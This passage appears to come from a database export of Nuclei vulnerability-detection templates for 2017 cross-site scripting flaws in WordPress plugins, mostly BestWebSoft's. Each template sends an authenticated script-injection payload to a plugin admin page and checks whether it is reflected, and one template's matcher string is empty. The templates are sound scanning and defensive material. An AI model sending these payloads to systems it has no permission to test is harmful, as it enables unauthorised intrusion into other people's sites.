cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pinterest\n framework: wordpress\n publicwww-query: /wp-content/plugins/bws-pinterest/\n tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Pinterest by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950", "hash": "cd547b0e96de1cccbcae8893a56bd4d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe7" }, "name": "CVE-2017-18518.yaml", "content": "id: CVE-2017-18518\n\ninfo:\n name: SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.1.0\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18518\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18518\n - https://wordpress.org/plugins/bws-smtp/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18518\n cwe-id: CWE-79\n epss-score: 
0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: smtp\n framework: wordpress\n publicwww-query: /wp-content/plugins/bws-smtp/\n tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"SMTP by BestWebSoft\")'\n condition: and\n# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950", "hash": "2895d692e66f66cf2b302e25af4abcae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe8" }, "name": "CVE-2017-18527.yaml", "content": "id: CVE-2017-18527\n\ninfo:\n name: Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The pagination plugin before 1.0.7 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18527\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18527\n - https://wordpress.org/plugins/pagination/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18527\n cwe-id: CWE-79\n epss-score: 0.00088\n 
epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pagination\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pagination/\"\n tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Pagination by BestWebSoft\")'\n condition: and\n# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950", "hash": "af0286d403301f0e57479221fad43b92", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe9" }, "name": "CVE-2017-18528.yaml", "content": "id: CVE-2017-18528\n\ninfo:\n name: PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18528\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18528\n - https://wordpress.org/plugins/pdf-print/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18528\n cwe-id: CWE-79\n 
epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:pdf_\\&_print:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pdf_\\&_print\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pdf-print/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"PDF & Print by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950", "hash": "0119a16578054a48349f4f6c47fa62e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fea" }, "name": "CVE-2017-18529.yaml", "content": "id: CVE-2017-18529\n\ninfo:\n name: PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The promobar plugin before 1.1.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18529\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18529\n - https://wordpress.org/plugins/promobar/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18529\n cwe-id: 
CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: promobar\n framework: wordpress\n publicwww-query: /wp-content/plugins/promobar/\n tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"PromoBar by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950", "hash": "71d97d13e66b0480ad94d2f31fd1a6be", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307feb" }, "name": "CVE-2017-18530.yaml", "content": "id: CVE-2017-18530\n\ninfo:\n name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The rating-bws plugin before 0.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18530\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530\n - https://wordpress.org/plugins/rating-bws/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18530\n cwe-id: CWE-79\n 
epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: rating\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/rating-bws/\"\n tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Rating by BestWebSoft\")'\n condition: and\n# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950", "hash": "42e24db85d71b21e599d49219ea10961", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fec" }, "name": "CVE-2017-18532.yaml", "content": "id: CVE-2017-18532\n\ninfo:\n name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The realty plugin before 1.1.0 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18532\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532\n - https://wordpress.org/plugins/realty/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18532\n cwe-id: CWE-79\n epss-score: 
0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: realty\n framework: wordpress\n publicwww-query: /wp-content/plugins/realty/\n tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/realty/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Realty by BestWebSoft\")'\n condition: and\n# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950", "hash": "005629000658c60286586e28b2e9b268", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fed" }, "name": "CVE-2017-18536.yaml", "content": "id: CVE-2017-18536\n\ninfo:\n name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.\n impact: |\n This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the 
vulnerability.\n reference:\n - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501\n - https://wordpress.org/plugins/stop-user-enumeration/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18536\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18536\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: fullworks\n product: stop_user_enumeration\n framework: wordpress\n tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950", "hash": "ca3ffdc9c9c89df338f73c8b75c7f64a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fee" }, "name": "CVE-2017-18537.yaml", "content": "id: CVE-2017-18537\n\ninfo:\n name: Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18537\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18537\n - https://wordpress.org/plugins/visitors-online/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n 
cve-id: CVE-2017-18537\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: visitors_online\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/visitors-online/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Visitors Online by\")'\n condition: and\n# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950", "hash": "2ed51cd33ceca34f571e143256f290bb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fef" }, "name": "CVE-2017-18542.yaml", "content": "id: CVE-2017-18542\n\ninfo:\n name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18542\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542\n - https://wordpress.org/plugins/zendesk-help-center/#developers\n classification:\n cvss-metrics: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18542\n cwe-id: CWE-79\n epss-score: 0.00221\n epss-percentile: 0.59511\n cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: zendesk_help_center\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/zendesk-help-center/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Zendesk Help Center by BestWebSoft\")'\n condition: and\n# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950", "hash": "8369c0b290c2bc9c327ed8386690e481", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff0" }, "name": "CVE-2017-18556.yaml", "content": "id: CVE-2017-18556\n\ninfo:\n name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.7.1\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18556\n - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556\n - https://wordpress.org/plugins/bws-google-analytics/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18556\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: google_analytics\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-google-analytics/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google Analytics by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950", "hash": "edc9147ee5c1c5a0c65b01f8d58edd74", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff1" }, "name": "CVE-2017-18557.yaml", "content": "id: CVE-2017-18557\n\ninfo:\n name: Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.3.6\n reference:\n - 
https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18557\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18557\n - https://wordpress.org/plugins/bws-google-maps/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18557\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: google_maps\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-google-maps/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google Maps by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950", "hash": "572ae9a3d06fcc3c546496e12f94bf03", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff2" }, "name": "CVE-2017-18558.yaml", "content": "id: CVE-2017-18558\n\ninfo:\n name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-testimonials plugin before 0.1.9 for WordPress has 
multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18558\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558\n - https://wordpress.org/plugins/bws-testimonials/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18558\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: testimonials\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-testimonials/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Testimonials by BestWebSoft\")'\n condition: and\n# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950", "hash": "bd63e073805835fc56728aa26cae0406", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff3" }, "name": "CVE-2017-18562.yaml", "content": "id: CVE-2017-18562\n\ninfo:\n name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The 
error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18562\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18562\n - https://wordpress.org/plugins/error-log-viewer/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18562\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: error_log_viewer\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/error-log-viewer/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: 